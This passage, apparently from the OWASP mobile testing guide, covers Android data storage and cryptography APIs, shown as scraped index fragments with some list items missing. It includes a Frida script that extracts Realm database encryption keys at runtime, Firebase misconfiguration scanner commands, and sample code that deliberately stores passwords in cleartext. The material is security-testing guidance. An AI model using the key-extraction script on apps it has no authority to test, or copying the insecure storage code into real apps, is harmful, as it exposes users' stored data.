SQLiteDatabase notSoSecure = openOrCreateDatabase(\"privateNotSoSecure\", MODE_PRIVATE, null);\nnotSoSecure.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR, Password VARCHAR);\");\nnotSoSecure.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPass');\");\nnotSoSecure.close();\n
Example in Kotlin:
var notSoSecure = openOrCreateDatabase(\"privateNotSoSecure\", Context.MODE_PRIVATE, null)\nnotSoSecure.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR, Password VARCHAR);\")\nnotSoSecure.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPass');\")\nnotSoSecure.close()\n
Once the activity has been called, the database file privateNotSoSecure
will be created with the provided data and stored in the clear text file /data/data/<package-name>/databases/privateNotSoSecure
.
The database's directory may contain several files besides the SQLite database:
Sensitive information should not be stored in unencrypted SQLite databases.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-databases-encrypted","title":"SQLite Databases (Encrypted)","text":"With the library SQLCipher, you can password-encrypt SQLite databases.
Example in Java:
SQLiteDatabase secureDB = SQLiteDatabase.openOrCreateDatabase(database, \"password123\", null);\nsecureDB.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR,Password VARCHAR);\");\nsecureDB.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPassEnc');\");\nsecureDB.close();\n
Example in Kotlin:
var secureDB = SQLiteDatabase.openOrCreateDatabase(database, \"password123\", null)\nsecureDB.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR,Password VARCHAR);\")\nsecureDB.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPassEnc');\")\nsecureDB.close()\n
Secure ways to retrieve the database key include:
Firebase is a development platform with more than 15 products, and one of them is Firebase Real-time Database. It can be leveraged by application developers to store and sync data with a NoSQL cloud-hosted database. The data is stored as JSON and is synchronized in real-time to every connected client and also remains available even when the application goes offline.
A misconfigured Firebase instance can be identified by making the following network call:
https://_firebaseProjectName_.firebaseio.com/.json
The firebaseProjectName can be retrieved from the mobile application by reverse engineering the application. Alternatively, analysts can use Firebase Scanner, a Python script that automates the task above, as shown below:
python FirebaseScanner.py -p <pathOfAPKFile>\n\npython FirebaseScanner.py -f <commaSeparatedFirebaseProjectNames>\n
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#realm-databases","title":"Realm Databases","text":"The Realm Database for Java is becoming more and more popular among developers. The database and its contents can be encrypted with a key stored in the configuration file.
//the getKey() method either gets the key from the server or from a KeyStore, or is derived from a password.\nRealmConfiguration config = new RealmConfiguration.Builder()\n .encryptionKey(getKey())\n .build();\n\nRealm realm = Realm.getInstance(config);\n
Access to the data depends on the encryption: unencrypted databases are easily accessible, while encrypted ones require investigation into how the key is managed - whether it's hardcoded or stored unencrypted in an insecure location such as shared preferences, or securely in the platform's KeyStore (which is best practice).
However, if an attacker has sufficient access to the device (e.g. root access) or can repackage the app, they can still retrieve encryption keys at runtime using tools like Frida. The following Frida script demonstrates how to intercept the Realm encryption key and access the contents of the encrypted database.
'use strict';\n\nfunction modulus(x, n){\n return ((x % n) + n) % n;\n}\n\nfunction bytesToHex(bytes) {\n for (var hex = [], i = 0; i < bytes.length; i++) { hex.push(((bytes[i] >>> 4) & 0xF).toString(16).toUpperCase());\n hex.push((bytes[i] & 0xF).toString(16).toUpperCase());\n }\n return hex.join(\"\");\n}\n\nfunction b2s(array) {\n var result = \"\";\n for (var i = 0; i < array.length; i++) {\n result += String.fromCharCode(modulus(array[i], 256));\n }\n return result;\n}\n\n// Main Modulus and function.\n\nif(Java.available){\n console.log(\"Java is available\");\n console.log(\"[+] Android Device.. Hooking Realm Configuration.\");\n\n Java.perform(function(){\n var RealmConfiguration = Java.use('io.realm.RealmConfiguration');\n if(RealmConfiguration){\n console.log(\"[++] Realm Configuration is available\");\n Java.choose(\"io.realm.Realm\", {\n onMatch: function(instance)\n {\n console.log(\"[==] Opened Realm Database...Obtaining the key...\")\n console.log(instance);\n console.log(instance.getPath());\n console.log(instance.getVersion());\n var encryption_key = instance.getConfiguration().getEncryptionKey();\n console.log(encryption_key);\n console.log(\"Length of the key: \" + encryption_key.length); \n console.log(\"Decryption Key:\", bytesToHex(encryption_key));\n\n }, \n onComplete: function(instance){\n RealmConfiguration.$init.overload('java.io.File', 'java.lang.String', '[B', 'long', 'io.realm.RealmMigration', 'boolean', 'io.realm.internal.OsRealmConfig$Durability', 'io.realm.internal.RealmProxyMediator', 'io.realm.rx.RxObservableFactory', 'io.realm.coroutines.FlowFactory', 'io.realm.Realm$Transaction', 'boolean', 'io.realm.CompactOnLaunchCallback', 'boolean', 'long', 'boolean', 'boolean').implementation = function(arg1)\n {\n console.log(\"[==] Realm onComplete Finished..\")\n\n }\n }\n\n });\n }\n });\n}\n
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#internal-storage","title":"Internal Storage","text":"You can save files to the device's internal storage. Files saved to internal storage are containerized by default and cannot be accessed by other apps on the device. When the user uninstalls your app, these files are removed. The following code snippets would persistently store sensitive data to internal storage.
Example for Java:
FileOutputStream fos = null;\ntry {\n fos = openFileOutput(FILENAME, Context.MODE_PRIVATE);\n fos.write(test.getBytes());\n fos.close();\n} catch (FileNotFoundException e) {\n e.printStackTrace();\n} catch (IOException e) {\n e.printStackTrace();\n}\n
Example for Kotlin:
var fos: FileOutputStream? = null\nfos = openFileOutput(\"FILENAME\", Context.MODE_PRIVATE)\nfos.write(test.toByteArray(Charsets.UTF_8))\nfos.close()\n
You should check the file mode to make sure that only the app can access the file. You can set this access with MODE_PRIVATE
. Modes such as MODE_WORLD_READABLE
(deprecated) and MODE_WORLD_WRITEABLE
(deprecated) may pose a security risk.
Search for the class FileInputStream
to find out which files are opened and read within the app.
Every Android-compatible device supports shared external storage. This storage may be removable (such as an SD card) or internal (non-removable). Files saved to external storage are world-readable. The user can modify them when USB mass storage is enabled. You can use the following code snippets to persistently store sensitive information to external storage as the contents of the file password.txt
.
Example for Java:
File file = new File (Environment.getExternalFilesDir(), \"password.txt\");\nString password = \"SecretPassword\";\nFileOutputStream fos;\n fos = new FileOutputStream(file);\n fos.write(password.getBytes());\n fos.close();\n
Example for Kotlin:
val password = \"SecretPassword\"\nval path = context.getExternalFilesDir(null)\nval file = File(path, \"password.txt\")\nfile.appendText(password)\n
The file will be created and the data will be stored in a clear text file in external storage once the activity has been called.
It's also worth knowing that files stored outside the application folder (data/data/<package-name>/
) will not be deleted when the user uninstalls the application. Finally, it's worth noting that the external storage can be used by an attacker to allow for arbitrary control of the application in some cases. For more information: see the blog post from Checkpoint.
The Android KeyStore supports relatively secure credential storage. As of Android 4.3 (API level 18), it provides public APIs for storing and using app-private keys. An app can use a public key to create a new private/public key pair for encrypting application secrets, and it can decrypt the secrets with the private key.
You can protect keys stored in the Android KeyStore with user authentication in a confirm credential flow. The user's lock screen credentials (pattern, PIN, password, or fingerprint) are used for authentication.
You can use stored keys in one of two modes:
Users are authorized to use keys for a limited period of time after authentication. In this mode, all keys can be used as soon as the user unlocks the device. You can customize the period of authorization for each key. You can use this option only if the secure lock screen is enabled. If the user disables the secure lock screen, all stored keys will become permanently invalid.
Users are authorized to use a specific cryptographic operation that is associated with one key. In this mode, users must request a separate authorization for each operation that involves the key. Currently, fingerprint authentication is the only way to request such authorization.
The level of security afforded by the Android KeyStore depends on its implementation, which depends on the device. Most modern devices offer a hardware-backed KeyStore implementation: keys are generated and used in a Trusted Execution Environment (TEE) or a Secure Element (SE), and the operating system can't access them directly. This means that the encryption keys themselves can't be easily retrieved, even from a rooted device. You can verify hardware-backed keys with Key Attestation. You can determine whether the keys are inside the secure hardware by checking the return value of the isInsideSecureHardware
method, which is part of the KeyInfo
class.
Note that the relevant KeyInfo indicates that secret keys and HMAC keys are insecurely stored on several devices despite private keys being correctly stored on the secure hardware.
The keys of a software-only implementation are encrypted with a per-user encryption master key. An attacker can access all keys stored on rooted devices that have this implementation in the folder /data/misc/keystore/
. Because the user's lock screen pin/password is used to generate the master key, the Android KeyStore is unavailable when the device is locked. For more security, Android 9 (API level 28) introduces the unlockedDeviceRequired
flag. By passing true
to the setUnlockedDeviceRequired
method, the app prevents its keys stored in AndroidKeystore
from being decrypted when the device is locked, and it requires the screen to be unlocked before allowing decryption.
The hardware-backed Android KeyStore adds another layer to the defense-in-depth security concept for Android. The Keymaster Hardware Abstraction Layer (HAL) was introduced with Android 6 (API level 23). Applications can verify if the key is stored inside the secure hardware (by checking if KeyInfo.isInsideSecureHardware
returns true
). Devices running Android 9 (API level 28) and higher can have a StrongBox Keymaster
module, an implementation of the Keymaster HAL that resides in a hardware security module which has its own CPU, secure storage, a true random number generator and a mechanism to resist package tampering. To use this feature, true
must be passed to the setIsStrongBoxBacked
method in either the KeyGenParameterSpec.Builder
class or the KeyProtection.Builder
class when generating or importing keys using AndroidKeystore
. To make sure that StrongBox is used during runtime, check that isInsideSecureHardware
returns true
and that the system does not throw StrongBoxUnavailableException
, which gets thrown if the StrongBox Keymaster isn't available for the given algorithm and key size associated with a key. Description of features on hardware-based keystore can be found on AOSP pages.
Keymaster HAL is an interface to hardware-backed components - Trusted Execution Environment (TEE) or a Secure Element (SE), which is used by Android Keystore. An example of such a hardware-backed component is Titan M.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#key-attestation","title":"Key Attestation","text":"For applications which heavily rely on the Android Keystore for business-critical operations, such as multi-factor authentication through cryptographic primitives or secure storage of sensitive data at the client side, Android provides the feature of Key Attestation, which helps to analyze the security of cryptographic material managed through the Android Keystore. From Android 8.0 (API level 26), key attestation was made mandatory for all new (Android 7.0 or higher) devices that need to have device certification for Google apps. Such devices use attestation keys signed by the Google hardware Attestation Root certificate, and this can be verified through the key attestation process.
During key attestation, we can specify the alias of a key pair and in return, get a certificate chain, which we can use to verify the properties of that key pair. If the root certificate of the chain is the Google Hardware Attestation Root certificate, and the checks related to key pair storage in hardware are made, it gives an assurance that the device supports hardware-level key attestation, and that the key is in the hardware-backed keystore that Google believes to be secure. Alternatively, if the attestation chain has any other root certificate, then Google does not make any claims about the security of the hardware.
Although the key attestation process can be implemented within the application directly, it is recommended that it should be implemented at the server-side for security reasons. The following are the high-level guidelines for the secure implementation of Key Attestation:
setAttestationChallenge
API with the challenge received from the server and should then retrieve the attestation certificate chain using the KeyStore.getCertificateChain
method.Software
, TrustedEnvironment
or StrongBox
. The client supports hardware-level key attestation if the security level is TrustedEnvironment
or StrongBox
and the attestation certificate chain contains a root certificate signed with the Google attestation root key.Note, if for any reason that process fails, it means that the key is not in security hardware. That does not mean that the key is compromised.
The typical example of Android Keystore attestation response looks like this:
{\n \"fmt\": \"android-key\",\n \"authData\": \"9569088f1ecee3232954035dbd10d7cae391305a2751b559bb8fd7cbb229bd...\",\n \"attStmt\": {\n \"alg\": -7,\n \"sig\": \"304402202ca7a8cfb6299c4a073e7e022c57082a46c657e9e53...\",\n \"x5c\": [\n \"308202ca30820270a003020102020101300a06082a8648ce3d040302308188310b30090603550406130...\",\n \"308202783082021ea00302010202021001300a06082a8648ce3d040302308198310b300906035504061...\",\n \"3082028b30820232a003020102020900a2059ed10e435b57300a06082a8648ce3d040302308198310b3...\"\n ]\n }\n}\n
In the above JSON snippet, the keys have the following meaning:
fmt
: Attestation statement format identifierauthData
: It denotes the authenticator data for the attestationalg
: The algorithm that is used for the Signaturesig
: Signaturex5c
: Attestation certificate chainNote: The sig
is generated by concatenating authData
and clientDataHash
(challenge sent by the server) and signing through the credential private key using the alg
signing algorithm. The same is verified at the server-side by using the public key in the first certificate.
For more understanding on the implementation guidelines, you can refer to Google Sample Code.
From a security analysis perspective, analysts may perform the following checks to verify the secure implementation of Key Attestation:
Android 9 (API level 28) adds the ability to import keys securely into the AndroidKeystore
. First, AndroidKeystore
generates a key pair using PURPOSE_WRAP_KEY
, which should also be protected with an attestation certificate. This pair aims to protect the Keys being imported to AndroidKeystore
. The encrypted keys are generated as ASN.1-encoded message in the SecureKeyWrapper
format, which also contains a description of the ways the imported key is allowed to be used. The keys are then decrypted inside the AndroidKeystore
hardware belonging to the specific device that generated the wrapping key, so that they never appear as plaintext in the device's host memory.
Example in Java:
KeyDescription ::= SEQUENCE {\n keyFormat INTEGER,\n authorizationList AuthorizationList\n}\n\nSecureKeyWrapper ::= SEQUENCE {\n wrapperFormatVersion INTEGER,\n encryptedTransportKey OCTET_STRING,\n initializationVector OCTET_STRING,\n keyDescription KeyDescription,\n secureKey OCTET_STRING,\n tag OCTET_STRING\n}\n
The code above presents the different parameters to be set when generating the encrypted keys in the SecureKeyWrapper format. Check the Android documentation on WrappedKeyEntry
for more details.
When defining the KeyDescription AuthorizationList, the following parameters will affect the encrypted keys security:
algorithm
parameter specifies the cryptographic algorithm with which the key is usedkeySize
parameter specifies the size, in bits, of the key, measuring in the normal way for the key's algorithmdigest
parameter specifies the digest algorithms that may be used with the key to perform signing and verification operationsOlder Android versions don't include KeyStore, but they do include the KeyStore interface from JCA (Java Cryptography Architecture). You can use KeyStores that implement this interface to ensure the secrecy and integrity of keys stored with KeyStore; BouncyCastle KeyStore (BKS) is recommended. All implementations are based on the fact that files are stored on the filesystem; all files are password-protected. To create one, use the KeyStore.getInstance(\"BKS\", \"BC\") method
, where \"BKS\" is the KeyStore name (BouncyCastle Keystore) and \"BC\" is the provider (BouncyCastle). You can also use SpongyCastle as a wrapper and initialize the KeyStore as follows: KeyStore.getInstance(\"BKS\", \"SC\")
.
Be aware that not all KeyStores properly protect the keys stored in the KeyStore files.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-a-cryptographic-key-techniques","title":"Storing a Cryptographic Key: Techniques","text":"To mitigate unauthorized use of keys on the Android device, Android KeyStore lets apps specify authorized uses of their keys when generating or importing the keys. Once made, authorizations cannot be changed.
Storing a Key - from most secure to least secure:
/sdcard/
)You can use the hardware-backed Android KeyStore if the device is running Android 7.0 (API level 24) and above with available hardware component (Trusted Execution Environment (TEE) or a Secure Element (SE)). You can even verify that the keys are hardware-backed by using the guidelines provided for the secure implementation of Key Attestation. If a hardware component is not available and/or support for Android 6.0 (API level 23) and below is required, then you might want to store your keys on a remote server and make them available after authentication.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-keys-on-the-server","title":"Storing Keys on the Server","text":"It is possible to securely store keys on a key management server, however the app needs to be online to decrypt the data. This might be a limitation for certain mobile app use cases and should be carefully thought through, as this becomes part of the architecture of the app and might highly impact usability.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#deriving-keys-from-user-input","title":"Deriving Keys from User Input","text":"Deriving a key from a user provided passphrase is a common solution (depending on which Android API level you use), but it also impacts usability, might affect the attack surface and could introduce additional weaknesses.
Each time the application needs to perform a cryptographic operation, the user's passphrase is needed. Either the user is prompted for it every time, which isn't an ideal user experience, or the passphrase is kept in memory as long as the user is authenticated. Keeping the passphrase in memory is not a best-practice, as any cryptographic material must only be kept in memory while it is being used. Zeroing out a key is often a very challenging task as explained in \"Cleaning out Key Material\".
Additionally, consider that keys derived from a passphrase have their own weaknesses. For instance, the passwords or passphrases might be reused by the user or easy to guess. Please refer to the Testing Cryptography chapter for more information.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#cleaning-out-key-material","title":"Cleaning out Key Material","text":"The key material should be cleared out from memory as soon as it is no longer needed. There are certain limitations of reliably cleaning up secret data in languages with a garbage collector (Java) and immutable strings (Swift, Objective-C, Kotlin). The Java Cryptography Architecture Reference Guide suggests using char[]
instead of String
for storing sensitive data, and nullify array after usage.
Note that some ciphers do not properly clean up their byte-arrays. For instance, the AES Cipher in BouncyCastle does not always clean up its latest working key, leaving some copies of the byte-array in memory. Next, BigInteger-based keys (e.g. private keys) cannot be removed from the heap, nor zeroed out without additional effort. Clearing a byte array can be achieved by writing a wrapper which implements Destroyable.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-keys-using-android-keystore-api","title":"Storing Keys using Android KeyStore API","text":"A more user-friendly and recommended way is to use the Android KeyStore API system (itself or through KeyChain) to store key material. If it is possible, hardware-backed storage should be used. Otherwise, it should fallback to software implementation of Android Keystore. However, be aware that the AndroidKeyStore
API has been changed significantly throughout versions of Android. In earlier versions, the AndroidKeyStore
API only supported storing public/private key pairs (e.g., RSA). Symmetric key support has only been added since Android 6.0 (API level 23). As a result, a developer needs to handle the different Android API levels to securely store symmetric keys.
In order to securely store symmetric keys on devices running on Android 5.1 (API level 22) or lower, we need to generate a public/private key pair. We encrypt the symmetric key using the public key and store the private key in the AndroidKeyStore
. The encrypted symmetric key can be encoded using base64 and stored in the SharedPreferences
. Whenever we need the symmetric key, the application retrieves the private key from the AndroidKeyStore
and decrypts the symmetric key.
Envelope encryption, or key wrapping, is a similar approach that uses symmetric encryption to encapsulate key material. Data encryption keys (DEKs) can be encrypted with key encryption keys (KEKs) which are securely stored. Encrypted DEKs can be stored in SharedPreferences
or written to files. When required, the application reads the KEK, then decrypts the DEK. Refer to OWASP Cryptographic Storage Cheat Sheet to learn more about encrypting cryptographic keys.
Also, as the illustration of this approach, refer to the EncryptedSharedPreferences from androidx.security.crypto package.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#insecure-options-to-store-keys","title":"Insecure options to store keys","text":"A less secure way of storing encryption keys, is in the SharedPreferences of Android. When SharedPreferences are used, the file is only readable by the application that created it. However, on rooted devices, any other application with root access can read the SharedPreferences file of other apps. This is not the case for the AndroidKeyStore, since AndroidKeyStore access is managed on the kernel level, which needs considerably more work and skill to bypass without the AndroidKeyStore clearing or destroying the keys.
The last three options are to use hardcoded encryption keys in the source code, having a predictable obfuscation function or key derivation function based on stable attributes, and storing generated keys in public places like /sdcard/
. Hardcoded encryption keys are an issue, since this means every instance of the application uses the same encryption key. An attacker can reverse-engineer a local copy of the application to extract the cryptographic key, and use that key to decrypt any data which was encrypted by the application on any device.
Next, when you have a predictable key derivation function based on identifiers which are accessible to other applications, the attacker only needs to find the KDF and apply it to the device to find the key. Lastly, storing encryption keys publicly is also highly discouraged, as other applications can have permission to read the public partition and steal the keys.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#data-encryption-using-third-party-libraries","title":"Data Encryption Using Third Party Libraries","text":"There are several different open-source libraries that offer encryption capabilities specific to the Android platform.
Please keep in mind that as long as the key is not stored in the KeyStore, it is always possible to easily retrieve the key on a rooted device and then decrypt the values you are trying to protect.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#keychain","title":"KeyChain","text":"The KeyChain class is used to store and retrieve system-wide private keys and their corresponding certificates (chain). The user will be prompted to set a lock screen pin or password to protect the credential storage if something is being imported into the KeyChain for the first time. Note that the KeyChain is system-wide, every application can access the materials stored in the KeyChain.
Inspect the source code to determine whether native Android mechanisms identify sensitive information. Sensitive information should be encrypted, not stored in clear text. For sensitive information that must be stored on the device, several API calls are available to protect the data via the KeyChain
class. Complete the following steps:
AndroidKeystore
, import java.security.KeyStore
, import javax.crypto.Cipher
, import java.security.SecureRandom
, and corresponding usages.store(OutputStream stream, char[] password)
function to store the KeyStore to disk with a password. Make sure that the password is provided by the user, not hard-coded.There are many legitimate reasons to create log files on a mobile device, such as keeping track of crashes, errors, and usage statistics. Log files can be stored locally when the app is offline and sent to the endpoint once the app is online. However, logging sensitive data may expose the data to attackers or malicious applications, and it might also violate user confidentiality. You can create log files in several ways. The following list includes two classes that are available for Android:
Android provides users with an auto-backup feature. The backups usually include copies of data and settings for all installed apps. Given its diverse ecosystem, Android supports many backup options:
Stock Android has built-in USB backup facilities. When USB debugging is enabled, use the adb backup
command to create full data backups and backups of an app's data directory.
Google provides a \"Back Up My Data\" feature that backs up all app data to Google's servers.
Two Backup APIs are available to app developers:
Key/Value Backup (Backup API or Android Backup Service) uploads to the Android Backup Service cloud.
Auto Backup for Apps: With Android 6.0 (API level 23) and above, Google added the \"Auto Backup for Apps feature\". This feature automatically syncs at most 25MB of app data with the user's Google Drive account.
OEMs may provide additional options. For example, HTC devices have a \"HTC Backup\" option that performs daily backups to the cloud when activated.
Apps must carefully ensure that sensitive user data doesn't end up in these backups, as this may allow an attacker to extract it.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#adb-backup-support","title":"ADB Backup Support","text":"Android provides an attribute called allowBackup
to back up all your application data. This attribute is set in the AndroidManifest.xml
file. If the value of this attribute is true, the device allows users to back up the application with Android Debug Bridge (ADB) via the command $ adb backup
.
To prevent the app data backup, set the android:allowBackup
attribute to false. When this attribute is unavailable, the allowBackup setting is enabled by default, and backup must be manually deactivated.
Note: If the device was encrypted, then the backup files will be encrypted as well.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#process-memory","title":"Process Memory","text":"All applications on Android use memory to perform normal computational operations like any regular modern-day computer. It is of no surprise then that at times sensitive operations will be performed within process memory. For this reason, it is important that once the relevant sensitive data has been processed, it should be disposed from process memory as quickly as possible.
The investigation of an application's memory can be done from memory dumps, and from analyzing the memory in real time via a debugger.
For an overview of possible sources of data exposure, check the documentation and identify application components before you examine the source code. For example, sensitive data from a backend may be in the HTTP client, the XML parser, etc. You want all these copies to be removed from memory as soon as possible.
In addition, understanding the application's architecture and the architecture's role in the system will help you identify sensitive information that doesn't have to be exposed in memory at all. For example, assume your app receives data from one server and transfers it to another without any processing. That data can be handled in an encrypted format, which prevents exposure in memory.
However, if you need to expose sensitive data in memory, you should make sure that your app is designed to expose as few data copies as possible as briefly as possible. In other words, you want the handling of sensitive data to be centralized (i.e., with as few components as possible) and based on primitive, mutable data structures.
The latter requirement gives developers direct memory access. Make sure that they use this access to overwrite the sensitive data with dummy data (typically zeroes). Examples of preferable data types include byte []
and char []
, but not String
or BigInteger
. Whenever you try to modify an immutable object like String
, you create and change a copy of the object.
Using non-primitive mutable types like StringBuffer
and StringBuilder
may be acceptable, but it's indicative and requires care. Types like StringBuffer
are used to modify content (which is what you want to do). To access such a type's value, however, you would use the toString
method, which would create an immutable copy of the data. There are several ways to use these data types without creating an immutable copy, but they require more effort than using a primitive array. Safe memory management is one benefit of using types like StringBuffer
, but this can be a two-edged sword. If you try to modify the content of one of these types and the copy exceeds the buffer capacity, the buffer size will automatically increase. The buffer content may be copied to a different location, leaving the old content without a reference use to overwrite it.
Unfortunately, few libraries and frameworks are designed to allow sensitive data to be overwritten. For example, destroying a key, as shown below, doesn't remove the key from memory:
Example in Java:
SecretKey secretKey = new SecretKeySpec(\"key\".getBytes(), \"AES\");\nsecretKey.destroy();\n
Example in Kotlin:
val secretKey: SecretKey = SecretKeySpec(\"key\".toByteArray(), \"AES\")\nsecretKey.destroy()\n
Overwriting the backing byte-array from secretKey.getEncoded
doesn't remove the key either; the SecretKeySpec-based key returns a copy of the backing byte-array. See the sections below for the proper way to remove a SecretKey
from memory.
The RSA key pair is based on the BigInteger
type and therefore resides in memory after its first use outside the AndroidKeyStore
. Some ciphers (such as the AES Cipher
in BouncyCastle
) do not properly clean up their byte-arrays.
User-provided data (credentials, social security numbers, credit card information, etc.) is another type of data that may be exposed in memory. Regardless of whether you flag it as a password field, EditText
delivers content to the app via the Editable
interface. If your app doesn't provide Editable.Factory
, user-provided data will probably be exposed in memory for longer than necessary. The default Editable
implementation, the SpannableStringBuilder
, causes the same issues as Java's StringBuilder
and StringBuffer
cause (discussed above).
The features provided by third-party services can involve tracking services to monitor the user's behavior while using the app, selling banner advertisements, or improving the user experience.
The downside is that developers don't usually know the details of the code executed via third-party libraries. Consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed.
Most third-party services are implemented in two ways:
At certain points in time, the user will have to enter sensitive information into the application. This data may be financial information such as credit card data or user account passwords, or maybe healthcare data. The data may be exposed if the app doesn't properly mask it while it is being typed.
In order to prevent disclosure and mitigate risks such as shoulder surfing you should verify that no sensitive data is exposed via the user interface unless explicitly required (e.g. a password being entered). For the data required to be present it should be properly masked, typically by showing asterisks or dots instead of clear text.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#screenshots","title":"Screenshots","text":"Manufacturers want to provide device users with an aesthetically pleasing experience at application startup and exit, so they introduced the screenshot-saving feature for use when the application is backgrounded. This feature may pose a security risk. Sensitive data may be exposed if the user deliberately screenshots the application while sensitive data is displayed. A malicious application that is running on the device and able to continuously capture the screen may also expose data. Screenshots are written to local storage, from which they may be recovered by a rogue application (if the device is rooted) or someone who has stolen the device.
For example, capturing a screenshot of a banking application may reveal information about the user's account, credit, transactions, and so on.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#app-notifications","title":"App Notifications","text":"It is important to understand that notifications should never be considered private. When a notification is handled by the Android system it is broadcasted system-wide and any application running with a NotificationListenerService can listen for these notifications to receive them in full and may handle them however it wants.
There are many known malware samples, such as Joker and Alien, which abuse the NotificationListenerService
to listen for notifications on the device and then send them to attacker-controlled C2 infrastructure. Commonly this is done to listen for two-factor authentication (2FA) codes that appear as notifications on the device which are then sent to the attacker. A safer alternative for the user would be to use a 2FA application that does not generate notifications.
Furthermore, there are a number of apps on the Google Play Store that provide notification logging, which locally logs any notifications on the Android system. This highlights that notifications are in no way private on Android and are accessible by any other app on the device.
For this reason all notification usage should be inspected for confidential or high risk information that could be used by malicious applications.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#keyboard-cache","title":"Keyboard Cache","text":"When users enter information in input fields, the software automatically suggests data. This feature can be very useful for messaging apps. However, the keyboard cache may disclose sensitive information when the user selects an input field that takes this type of information.
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/","title":"Android Cryptographic APIs","text":""},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#overview","title":"Overview","text":"In the chapter \"Mobile App Cryptography\", we introduced general cryptography best practices and described typical issues that can occur when cryptography is used incorrectly. In this chapter, we'll go into more detail on Android's cryptography APIs. We'll show how to identify usage of those APIs in the source code and how to interpret cryptographic configurations. When reviewing code, make sure to compare the cryptographic parameters used with the current best practices, as linked in this guide.
We can identify the key components of the cryptography system on Android:
Android cryptography APIs are based on the Java Cryptography Architecture (JCA). JCA separates the interfaces and implementation, making it possible to include several security providers that can implement sets of cryptographic algorithms. Most of the JCA interfaces and classes are defined in the java.security.*
and javax.crypto.*
packages. In addition, there are Android specific packages android.security.*
and android.security.keystore.*
.
KeyStore and KeyChain provide APIs for storing and using keys (behind the scene, KeyChain API uses KeyStore system). These systems allow to administer the full lifecycle of the cryptographic keys. Requirements and guidance for implementation of cryptographic key management can be found in Key Management Cheat Sheet. We can identify following phases:
Please note that storing of a key is analyzed in the chapter \"Testing Data Storage\".
These phases are managed by the Keystore/KeyChain system. However how the system works depends on how the application developer implemented it. For the analysis process you should focus on functions which are used by the application developer. You should identify and verify the following functions:
Apps that target modern API levels, went through the following changes:
Crypto
provider has dropped and the provider is deprecated. The same applies to its SHA1PRNG
for secure random.AndroidOpenSSL
, is preferred above using Bouncy Castle and it has new implementations: AlgorithmParameters:GCM
, KeyGenerator:AES
, KeyGenerator:DESEDE
, KeyGenerator:HMACMD5
, KeyGenerator:HMACSHA1
, KeyGenerator:HMACSHA224
, KeyGenerator:HMACSHA256
, KeyGenerator:HMACSHA384
, KeyGenerator:HMACSHA512
, SecretKeyFactory:DESEDE
, and Signature:NONEWITHECDSA
.IvParameterSpec.class
anymore for GCM, but use the GCMParameterSpec.class
instead.OpenSSLSocketImpl
to ConscryptFileDescriptorSocket
, and ConscryptEngineSocket
.SSLSession
with null parameters give a NullPointerException
.InvalidKeySpecException
is thrown.SocketException
.getInstance
method and you target any API below 28. If you target Android 9 (API level 28) or above, you get an error.Crypto
security provider is now removed. Calling it will result in a NoSuchProviderException
.The following list of recommendations should be considered during app examination:
SHA1PRNG
as they are deprecated.Android relies on the java.security.Provider
class to implement Java Security services. These providers are crucial to ensure secure network communications and secure other functionalities which depend on cryptography.
The list of security providers included in Android varies between versions of Android and the OEM-specific builds. Some security provider implementations in older versions are now known to be less secure or vulnerable. Thus, Android applications should not only choose the correct algorithms and provide a good configuration, in some cases they should also pay attention to the strength of the implementations in the legacy security providers.
You can list the set of existing security providers using following code:
StringBuilder builder = new StringBuilder();\nfor (Provider provider : Security.getProviders()) {\n builder.append(\"provider: \")\n .append(provider.getName())\n .append(\" \")\n .append(provider.getVersion())\n .append(\"(\")\n .append(provider.getInfo())\n .append(\")\\n\");\n}\nString providers = builder.toString();\n//now display the string on the screen or in the logs for debugging.\n
This is the output for Android 9 (API level 28) running in an emulator with Google Play APIs:
provider: AndroidNSSP 1.0(Android Network Security Policy Provider)\nprovider: AndroidOpenSSL 1.0(Android's OpenSSL-backed security provider)\nprovider: CertPathProvider 1.0(Provider of CertPathBuilder and CertPathVerifier)\nprovider: AndroidKeyStoreBCWorkaround 1.0(Android KeyStore security provider to work around Bouncy Castle)\nprovider: BC 1.57(BouncyCastle Security Provider v1.57)\nprovider: HarmonyJSSE 1.0(Harmony JSSE Provider)\nprovider: AndroidKeyStore 1.0(Android KeyStore security provider)\n
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#updating-security-provider","title":"Updating security provider","text":"Keeping up-to-date and patched component is one of security principles. The same applies to provider
. Application should check if used security provider is up-to-date and if not, update it.
For some applications that support older versions of Android (e.g.: only used versions lower than Android 7.0 (API level 24)), bundling an up-to-date library may be the only option. Conscrypt library is a good choice in this situation to keep the cryptography consistent across the different API levels and avoid having to import Bouncy Castle which is a heavier library.
Conscrypt for Android can be imported this way:
dependencies {\n implementation 'org.conscrypt:conscrypt-android:last_version'\n}\n
Next, the provider must be registered by calling:
Security.addProvider(Conscrypt.newProvider())\n
